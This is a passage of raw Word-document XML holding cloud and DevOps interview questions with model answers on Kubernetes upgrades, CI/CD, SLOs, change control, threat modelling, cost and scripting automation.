          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1341. Scenario: A GKE or AKS node upgrade is blocked. What would you investigate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check PodDisruptionBudgets, pods without controllers, local storage, daemonsets, insufficient capacity, maintenance windows, node pool surge settings, cluster autoscaler limits, and workloads that cannot be evicted. Plan upgrades with capacity buffers and application disruption budgets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1342. How do you support both Azure and GCP cloud services as a cloud engineer?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Focus on common cloud engineering principles: IAM, networking, compute, Kubernetes, storage, logging, security, and automation. Understand platform-specific services and identity models, but standardize through Terraform modules, CI/CD patterns, tagging, observability, and governance. Avoid assuming both clouds behave identically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1343. Scenario: You need to migrate a workload from manual deployment to CI/CD. What is your approach?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Document the current release process, identify risks, create build artifacts, automate tests, define environments, add deployment scripts or GitOps manifests, introduce approvals, and perform parallel dry runs. Start with a low-risk service, prove the pattern, then scale it as a reusable template.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1344. How would you build automated runbooks for resilient operations?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start from common incidents and manual operational tasks. Convert diagnosis and remediation steps into scripts, workflows, or self-service actions with safeguards, logging, approvals where needed, and rollback. Runbooks should include symptoms, impact, commands, owners, escalation, and validation steps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1345. Scenario: A runbook fixed an incident once but failed the next time. What would you improve?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Review assumptions, missing prechecks, dependency changes, permissions, input validation, and observability gaps. Add automated tests or simulations for the runbook, version it, assign ownership, and update it after each incident. Runbooks need lifecycle management like code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1346. How do you shift-left QA, security, and operations into the SDLC?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Move testing, security checks, deployment validation, observability requirements, and operational readiness earlier into design and pull requests. Use templates, CI gates, threat modeling, automated tests, runbook requirements, and production readiness checklists. Shift-left works best when teams get fast feedback, not only more blockers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1347. Scenario: A team says security checks slow delivery. How do you handle it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Measure where delays occur, tune false positives, provide clear remediation, cache scans where safe, parallelize CI jobs, and define risk-based gates. Keep critical controls mandatory while improving developer experience. The goal is secure delivery with less friction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1348. How would you measure platform perceived performance?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use user-facing metrics such as page load time, API latency percentiles, error rate, availability, synthetic checks, and real user monitoring. Combine these with backend traces and dependency metrics. Perceived performance should be measured from the customer or consumer perspective, not only server CPU.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1349. Scenario: Customer-facing latency increases after a release. How would you lead the response?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Confirm impact, compare before/after metrics, check traces, logs, dependencies, database queries, cache behavior, and resource usage. If SLO impact is severe, roll back or shift traffic. Communicate status, preserve evidence, and create follow-up actions such as performance tests, canary gates, or better dashboards.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1350. How do error budgets influence release decisions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Error budgets quantify how much unreliability is acceptable within an SLO window. If the budget is healthy, teams can ship faster. If it is burning too quickly, teams should slow risky releases and prioritize reliability work. This creates a shared language between product speed and service stability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1351. Scenario: Error budget is almost exhausted but a business feature must ship. What do you recommend?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Assess feature urgency, risk, rollback options, blast radius, and current service health. Consider canary release, feature flags, off-peak deployment, additional monitoring, or delaying non-critical parts. Make the decision transparent with business and engineering stakeholders.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1352. How do you improve developer productivity through platform engineering?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Provide golden paths, reusable CI/CD templates, Terraform modules, self-service environments, standard observability, secure defaults, documentation, and support channels. Measure developer experience using lead time, onboarding time, failed deployments, support tickets, and satisfaction feedback.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1353. Scenario: Developers bypass the platform because it is too slow. What would you do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Interview users, map pain points, reduce approval friction, improve templates, automate common requests, publish clear docs, and define support SLAs. Keep necessary controls but make the secure path easier than the workaround. Platform adoption depends on trust and usefulness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1354. How would you create and maintain engineering standards?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Define standards collaboratively, keep them practical, version them, provide examples, and enforce critical ones with automation. Standards should cover branching, CI/CD, IaC, naming, tagging, security, logging, monitoring, runbooks, and production readiness. Review them periodically as tools and risks change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1355. Scenario: Different teams use different CI/CD tools. How would you standardize without causing disruption?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Create a target reference architecture and migration roadmap. Start with common controls such as artifact storage, scanning, approvals, and observability even if tools differ. Provide templates for preferred tools, support migration gradually, and measure improvement. Avoid a big-bang migration unless required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1356. How do you handle change control in a high-compliance environment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Keep traceability from requirement to code, tests, artifact, approval, deployment, and rollback. Automate evidence collection through CI/CD, use approvals for production, document risk and impact, and maintain audit logs. Good change control should reduce production risk while preserving delivery flow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1357. Scenario: An emergency production fix is needed outside normal change windows. What is your process?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use an emergency change process with incident context, risk assessment, minimal approved change, peer review where possible, clear rollback, and post-change documentation. After the incident, reconcile Git/Terraform state and complete retrospective actions. Emergency access should be controlled and auditable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1358. How would you design release management for weekly production deployments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use release calendars, automated testing, artifact promotion, environment parity, deployment checklists, approvals, feature flags, rollback plans, and post-release monitoring. Keep releases small and frequent. Track deployment frequency, change failure rate, and lead time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1359. Scenario: A weekly release fails repeatedly in production. What systemic issues would you investigate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Investigate test coverage, environment drift, missing dependency tests, large batch size, manual steps, weak rollback, unclear ownership, poor observability, and release pressure. Fix the system rather than blaming individuals. Introduce smaller changes, better gates, and post-release verification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1360. How would you design architecture diagrams and deployment guides that engineers actually use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Keep them current, simple, and connected to real operations. Include service boundaries, dependencies, data flow, network path, IAM, deployment flow, failure modes, and ownership. Store diagrams and guides near code when possible and update them as part of change review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1361. Scenario: A production incident happens and there is no runbook or architecture diagram. What do you do after recovery?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Create the missing runbook and diagram as part of the post-incident action plan. Capture symptoms, root cause, detection gaps, remediation steps, owners, and prevention work. Assign due dates and track completion. Documentation should be treated as a reliability control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1362. How do you approach threat modeling for cloud workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Identify assets, users, trust boundaries, data flows, entry points, and likely threats. Review IAM, network exposure, secrets, data storage, logging, supply chain, and dependency risks. Convert findings into prioritized mitigations and CI/CD or policy controls where possible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1363. Scenario: A new cloud design includes public endpoints and sensitive customer data. What questions would you ask?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Ask why public exposure is required, what data is processed, authentication and authorization model, encryption, logging, data retention, WAF/DDoS controls, private connectivity options, audit requirements, and regulatory constraints. Recommend private access or least-exposure design where possible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1364. How do you incorporate customer fairness and regulatory expectations into engineering decisions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Consider how outages, data issues, security weaknesses, or biased automation affect customers. Build controls for reliability, privacy, auditability, access, and transparency. In regulated environments, engineering decisions should protect customers, maintain integrity, and produce evidence for compliance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1365. Scenario: A reliability improvement increases cost. How do you justify it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Compare cost with business impact, incident reduction, customer impact, regulatory risk, SLO improvement, and operational toil reduction. Present options with tradeoffs, such as autoscaling, right-sizing, multi-zone redundancy, or targeted HA only for critical paths. Good justification links engineering investment to risk and outcomes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1366. How do you balance cost efficiency with high availability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Classify services by criticality, define SLOs, use autoscaling, right-size resources, avoid overprovisioning, use committed discounts where suitable, and apply HA patterns only where justified. Cost optimization should not blindly reduce redundancy for critical customer journeys.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1367. Scenario: Cloud costs rise after adopting Kubernetes. What would you investigate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check node utilization, requests and limits, idle node pools, overprovisioned workloads, autoscaler settings, logging volume, load balancers, persistent disks, image storage, data egress, and non-production clusters. Add labels, dashboards, budgets, and ownership-based reporting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1368. How would you demonstrate senior-level ownership in this Cloud Engineering role?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Show examples where you identified systemic problems, aligned stakeholders, designed a practical solution, implemented automation, measured outcomes, documented standards, mentored others, and improved reliability or delivery. Senior ownership means driving outcomes, not only completing tickets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1369. Scenario: You are joining this team in the first 90 days. What would your plan be?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First 30 days: understand services, incidents, architecture, CI/CD, Terraform, cloud accounts, observability, and stakeholders. Next 30 days: identify top reliability, security, and delivery bottlenecks, then deliver quick wins such as alert tuning or pipeline fixes. Final 30 days: propose a roadmap for SLOs, IaC standardization, DevSecOps gates, runbooks, DORA metrics, and platform improvements with measurable outcomes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Scripting &amp; Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1370. Python automation: Design a production-ready script that inventories all GCP projects, collects labels and owners, and exports non-compliant resources to CSV.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use the Resource Manager API to list all projects the service account can see, paginate through resources per project using each service's client library, and collect labels including an 'owner' label with a defined compliance policy (e.g. every project must have owner, cost-center, and environment labels). Flag resources missing required labels or violating naming conventions, write results to CSV with project, resource, missing/invalid labels, and severity, and run it as a scheduled job with alerting on newly non-compliant resources rather than a one-off script.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1371. Python automation: How would you automate GKE namespace creation with quotas, RBAC, network policies, labels, and audit logging?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build a self-service tool (CLI or small API) that takes a namespace request (team, quota tier, network isolation level) and applies a templated set of manifests - Namespace with standard labels, ResourceQuota and LimitRange sized to the tier, RoleBindings scoped to the requesting team's group, and default-deny NetworkPolicies with explicit allow rules. Log every creation with who requested it and when to an audit trail, and make the tool idempotent so re-running it reconciles drift rather than erroring on existing resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1372. Bash automation: Write the approach for a shell script that checks disk, memory, CPU, failed systemd units, and endpoint health across Linux servers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use `df`, `free`, `uptime`/`mpstat` for resource checks, `systemctl --failed` to list failed units, and `curl -sf -m 5` for endpoint health, wrapping each check in a function that returns a pass/fail status and appends to a structured (JSON or key=value) output. Run the script via SSH fan-out (Ansible ad-hoc or a simple parallel-ssh loop) across the fleet, aggregate results centrally, and exit non-zero with a clear summary if any host fails a threshold so it plugs into monitoring or CI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1373. GCP SDK automation: How would you build a Python tool that disables stale service-account keys only after approval and records every action?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use the IAM API to list service account keys and their lastUsedTime/creation date, flag keys unused beyond a threshold (e.g. 90 days), and generate a report requiring explicit approval (a ticket, Slack approval, or a --confirm flag with owner sign-off) before disabling rather than auto-deleting. Log every action - key ID, account, timestamp, approver, and outcome - to an audit log or BigQuery table, and always disable before delete so there's a recovery window if a key was flagged incorrectly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1374. Kubernetes automation: Design a script that finds CrashLoopBackOff, ImagePullBackOff, pending, and frequently restarted pods across all namespaces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use the Kubernetes Python or Go client to list pods cluster-wide, inspect container_statuses[].state.waiting.reason for CrashLoopBackOff/ImagePullBackOff, status.phase for Pending, and restart_count against a threshold, and group findings by namespace and owning workload (Deployment/StatefulSet). Output a structured summary (table or JSON) with pod name, reason, and age so on-call engineers can triage quickly, and optionally post it to a Slack channel on a schedule as a proactive health check.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1375. Terraform automation: How would you automate fmt, validate, lint, security scanning, plan generation, policy checks, and plan summaries in CI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Chain the checks as CI stages: `terraform fmt -check` and `terraform validate` first (fast, fail early), then tflint for style/best-practice issues, tfsec or Checkov for security misconfigurations, `terraform plan` with the output saved as an artifact, and OPA/Sentinel policy checks against the plan JSON before allowing apply. Post a human-readable plan summary as a PR comment so reviewers see exactly what will change without needing local Terraform access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1376. Log automation: Build an approach to parse application logs, group errors by service and exception, and report the top failures during an incident.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Stream or batch-read structured (JSON) logs, extract service name, exception type/message, and timestamp, and aggregate counts grouped by (service, exception signature) over the incident window using a normalized error signature (stripping variable data like IDs/timestamps from the message so similar errors group together). Rank by count and recency, and output a top-N summary with a sample stack trace per group so responders can triage the highest-impact failure first instead of scrolling raw logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1377. API automation: How would you implement pagination, retries, exponential backoff, rate-limit handling, authentication, and idempotency in a cloud API client?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Follow the API's pagination token/cursor pattern in a loop until no next-page token is returned, wrap requests in retry logic with exponential backoff and jitter on 429/5xx, and respect Retry-After headers when present rather than guessing a delay. Authenticate via short-lived tokens refreshed automatically before expiry, and make mutating calls idempotent using client-supplied idempotency keys or by checking current state before applying a change, so a retried request after a timeout does not double-apply.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1378. Configuration automation: How would you safely update YAML configuration across many repositories without destroying formatting or unrelated settings?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a YAML library that preserves comments and formatting (like ruamel.yaml in round-trip mode) rather than a naive load/dump that reformats the whole file, and target only the specific keys that need to change via a path-based update rather than rewriting the whole document. Run the change through a dry-run diff across all target repos first, open PRs automatically (e.g. via a bot) rather than pushing directly, and require review before merge so unexpected formatting changes are caught.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
